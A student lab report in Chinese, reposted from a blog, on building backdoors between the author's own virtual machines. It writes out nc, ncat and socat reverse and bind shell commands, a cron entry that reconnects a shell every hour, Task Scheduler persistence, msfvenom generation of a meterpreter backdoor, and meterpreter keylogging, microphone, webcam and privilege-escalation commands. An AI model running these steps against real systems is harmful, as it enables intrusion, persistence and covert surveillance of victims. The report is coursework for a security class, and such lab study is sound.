?

準(zhǔn)備工作：

使用 ipconfig 查看win7虛擬機(jī)IP地址為：192.168.236.130

使用 ipconfig 查看linux虛擬機(jī)IP地址為：192.168.236.131

?

?

實(shí)驗(yàn)內(nèi)容

?

一、使用nc或netcat遠(yuǎn)程獲取shell

（1）win獲得Linux shell

1．windows打開(kāi)監(jiān)聽(tīng)

進(jìn)入文件夾

cd netcat

開(kāi)始監(jiān)聽(tīng)

ncat.exe -l -p 4309

這里的 -l 是監(jiān)聽(tīng)模式，-p是選擇監(jiān)聽(tīng)的端口。

2. Linux反彈連接win

nc 192.168.236.130 4309 -e /bin/sh

?

3.windows下獲得一個(gè)linux shell，可運(yùn)行任何cmd指令，如ls

（2） Linux獲得Win Shell

1.Linux運(yùn)行監(jiān)聽(tīng)指令

nc -l -p 4309

2.Windows反彈連接Linux

ncat.exe -e cmd.exe 192.168.236.131 4309

?

3.Linux下看到Windows的命令提示

可以發(fā)現(xiàn)，linux端獲得了win的shell

?

（3） nc傳輸數(shù)據(jù)

1.在win端對(duì)4309端口進(jìn)行監(jiān)聽(tīng)

ncat.exe -l -p 4309

2.linux端連接到win端4309端口

nc 192.168.236.130 4309

3.傳輸通道建立，可以傳輸文字信息了

?

二、使用netcat獲取主機(jī)操作Shell，cron啟動(dòng)

1.在Win端進(jìn)行監(jiān)聽(tīng)

ncat.exe -l -p 4309

?2.使用crontab指令增加一條定時(shí)任務(wù)

crontab-e

crontab指令可以用于設(shè)置周期性被執(zhí)行的指令。該命令從標(biāo)準(zhǔn)輸入設(shè)備讀取指令，并將其存放于crontab文件中，以供之后讀取和執(zhí)行，"-e"表示編輯

3.添加指令令其定時(shí)反向連接

在最后添加一條定時(shí)連接win端口的指令

56 * * * * /bin/netcat 192.168.236.130 4309 -e /bin/sh

表示每小時(shí)的第56分鐘連接IP為192.168.236.130的主機(jī)（即虛擬機(jī)win7端）的4309端口，具體時(shí)間可以自行設(shè)定，我這里為了方便選擇了兩分鐘之后的時(shí)間

稍等片刻，發(fā)現(xiàn)成功獲取win端的shell

三、使用socat獲取主機(jī)操作Shell, 任務(wù)計(jì)劃啟動(dòng)

1.新建一個(gè)能運(yùn)行socat的任務(wù)

?①搜索任務(wù)計(jì)劃程序，點(diǎn)擊進(jìn)入

?

②點(diǎn)擊右側(cè)操作里的創(chuàng)建任務(wù)，并命名為“20164309 socat”

③新建觸發(fā)器，設(shè)定為在鎖定時(shí)觸發(fā)

?

③新建操作，選定目標(biāo)程序路徑，并且添加參數(shù)：

tcp-listen:4309 exec:cmd.exe,pty,stderr

這個(gè)命令可以將cmd.exe綁定到4309端口，并且將cmd.exe的stderr重定向到stdout上

?

?我們可以看到，創(chuàng)建任務(wù)成功

2.觸發(fā)任務(wù)，使其運(yùn)行

使用Windows+l鎖定主機(jī)后，再解鎖，發(fā)現(xiàn)程序已經(jīng)運(yùn)行

3.獲取shell

socat - tcp:192.168.236.130:4309

這里的第一個(gè)參數(shù)-代表標(biāo)準(zhǔn)的輸入輸出，第二個(gè)流連接到Windows主機(jī)的4309端口。

在實(shí)現(xiàn)的時(shí)候我出現(xiàn)了一個(gè)問(wèn)題：在tcp后多打了一個(gè)空格，卡了很久，不過(guò)好在成功了，大家引以為戒。

修改后發(fā)現(xiàn)已經(jīng)成功獲取cmd Shell：

四、使用MSF meterpreter生成可執(zhí)行文件，利用ncat或socat傳送到主機(jī)并運(yùn)行獲取主機(jī)Shell

1.生成后門(mén)

在linux端使用msfvenom工具，生成后門(mén)：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.194 LPORT=4309 -f exe > 20164309_backdoor.exe 192.168.236.131

其中-p 使用的payload，為有效載荷，就是被運(yùn)輸有東西。這里windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反彈回連的IP，即攻擊機(jī)linux的IP地址，LPORT是回連的端口，-f是生成文件的類型， >輸出到哪個(gè)文件

由于一開(kāi)始沒(méi)有充分理解這里的ip地址的意義，我使用了被攻擊win端的地址，導(dǎo)致在之后使用后門(mén)的時(shí)候?qū)覍沂?。?jīng)過(guò)理解我發(fā)現(xiàn)這里的ip是被攻擊主機(jī)需要連接的地址，即為攻擊機(jī)linux端的地址。

2. 使用nc進(jìn)行文件傳輸

需要在win端關(guān)閉殺軟和防火墻的條件下進(jìn)行

①在win端進(jìn)行監(jiān)聽(tīng)

ncat.exe -lv 4309 > 20164309_backdoor.exe

其中-lv表示可以觀察到連接狀態(tài)

?

?②在linux端傳輸文件

nc 192.168.236.130 4309 < 20164309_backdoor.exe發(fā)送文件

在win端命令行顯示傳輸成功

的確傳輸成功了

?3.在msf端控制臺(tái)設(shè)置反彈回連

輸入

msfconsole

進(jìn)入控制臺(tái)（之后由于實(shí)驗(yàn)屢次失敗我進(jìn)入了這個(gè)界面不知道多少次。。。幸虧這里有一個(gè)小彩蛋，每次進(jìn)入的界面大都和之前不一樣，也算是苦中作樂(lè)了吧）

use exploit/multi/handler

設(shè)置payload

set payload windows/meterpreter/reverse_tcp

使用生成后門(mén)程序時(shí)相同的payload

set LHOST 192.168.236.131

這里需要與生成后門(mén)程序的主機(jī)IP相同

set LPORT 4309

需要使用相同的端口

show options

顯示選項(xiàng)

exploit

進(jìn)行監(jiān)聽(tīng)

屢次嘗試，在糾正了剛剛說(shuō)的那個(gè)錯(cuò)誤后在win端運(yùn)行了正確的后門(mén)

發(fā)現(xiàn)可以調(diào)用win端shell

五、使用MSF meterpreter（或其他軟件）生成獲取目標(biāo)主機(jī)音頻、攝像頭、擊鍵記錄等內(nèi)容，并嘗試提權(quán)

還有很多功能可以使用，我們一個(gè)一個(gè)試試吧

1.使用screenshot進(jìn)行截屏，截屏得文件nQebvnBz.jpeg

2.使用keyscan_start指令開(kāi)始記錄下?lián)翩I的過(guò)程，亂輸一通試試：

成功記錄

3.使用record_mic指令截獲一段音頻,文件名為qbucCKSm.wav

4.或者使用webcam_snap進(jìn)行拍。。等等，為什么失敗了

發(fā)現(xiàn)無(wú)法進(jìn)行拍照，看看排除一下原因，發(fā)現(xiàn)：

貌似虛擬機(jī)無(wú)法調(diào)用內(nèi)置攝像頭

上網(wǎng)查查有什么解決的方法

？？？現(xiàn)在去買(mǎi)一個(gè)外置攝像頭也來(lái)不及了，忍痛割愛(ài)在自己主機(jī)上試試吧。。。

?按部就班地進(jìn)行試驗(yàn)：

查得ip地址為：192.168.6.194

傳輸后門(mén)

在linux準(zhǔn)備就緒后運(yùn)行后門(mén)

發(fā)現(xiàn)可以拍照了，那多拍幾張選一張看得出生理特征的（比如眼鏡（？？？）），就決定是你了:hAcbeMwj,jpeg

?

5.繼續(xù)實(shí)驗(yàn)嘗試提權(quán)

輸入getuid查看權(quán)限分組

輸入getsystem進(jìn)行提權(quán)

發(fā)現(xiàn)在提權(quán)時(shí)遇到了一些問(wèn)題，無(wú)法提權(quán)

有可能是win10賬號(hào)是管理員權(quán)限？那我再在win7虛擬機(jī)上嘗試一下普通用戶

還是失敗

再試試win7的管理員賬號(hào)

意想不到的是竟然成功了，希望大神們能幫忙解釋一下原理

?

基礎(chǔ)問(wèn)題解答：

(1)?? 例舉你能想到的一個(gè)后門(mén)進(jìn)入到你系統(tǒng)中的可能方式？

記得很久以前的三一五晚會(huì)曝光了一些手機(jī)APP擅自添加后門(mén)，導(dǎo)致巨大的財(cái)產(chǎn)損失的案例，那時(shí)候智能手機(jī)方興未艾，人們的安全意識(shí)也相對(duì)薄弱，但是現(xiàn)在這樣的事情還真實(shí)地發(fā)生在我們身邊；還有一些釣魚(yú)網(wǎng)站會(huì)誘導(dǎo)我們點(diǎn)擊下載一些后門(mén)程序，一旦程序運(yùn)行就成了人為刀俎我為魚(yú)肉的情形了。

(2)?? 例舉你知道的后門(mén)如何啟動(dòng)起來(lái)(win及linux)的方式？

后門(mén)可能會(huì)偽裝成正常的程序或軟件，誘導(dǎo)用戶使用，來(lái)獲取你的權(quán)限。

(3)?? Meterpreter有哪些給你映像深刻的功能？

遠(yuǎn)程拍照功能。在之前bm管理概論的課程中我閱讀了《無(wú)處可藏》這本書(shū)，有一段令我印象深刻的細(xì)節(jié)是斯諾登筆記本電腦的攝像頭用膠帶封住了，當(dāng)時(shí)我還認(rèn)為杞人憂天了，但是沒(méi)有想到這種技術(shù)門(mén)檻這么低。

(4)如何發(fā)現(xiàn)自己有系統(tǒng)有沒(méi)有被安裝后門(mén)？

對(duì)于我們來(lái)說(shuō)最好的辦法就是經(jīng)常性的殺毒、及時(shí)更新系統(tǒng)、病毒庫(kù)以查找后門(mén)。在實(shí)驗(yàn)中我還發(fā)現(xiàn)在進(jìn)行遠(yuǎn)程照相的時(shí)候我攝像頭旁邊的呼吸燈閃了一下，如果現(xiàn)實(shí)生活中遇到這種情況務(wù)必要注意了

?

實(shí)驗(yàn)心得：

這次實(shí)驗(yàn)最大的收獲就是明白了細(xì)節(jié)決定成敗。由于自己的粗心馬虎，這次實(shí)驗(yàn)幾乎花了我兩個(gè)晚上才完成，每一步都要遇到一些或多或少地小問(wèn)題。甚至一開(kāi)始為了不注冊(cè)碼云賬號(hào)沒(méi)有使用老師的ncet而去網(wǎng)上下載了一個(gè)，導(dǎo)致在傳輸文件的時(shí)候出現(xiàn)問(wèn)題；還有輸入socat命令的時(shí)候多打了一個(gè)空格，也導(dǎo)致無(wú)法順利調(diào)用shell；甚至在寫(xiě)實(shí)驗(yàn)報(bào)告的時(shí)候發(fā)現(xiàn)缺少關(guān)鍵的截圖而回過(guò)頭來(lái)臨時(shí)做臨時(shí)截的。在今后的實(shí)驗(yàn)和學(xué)習(xí)乃至工作中，我一定要戒驕戒躁，時(shí)刻關(guān)注細(xì)節(jié)，才能高質(zhì)量地完成任務(wù)。

?

轉(zhuǎn)載于:https://www.cnblogs.com/20164309-kx/p/10577470.html

總結(jié)

以上是生活随笔為你收集整理的Exp2 后门原理与实践 20164309的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。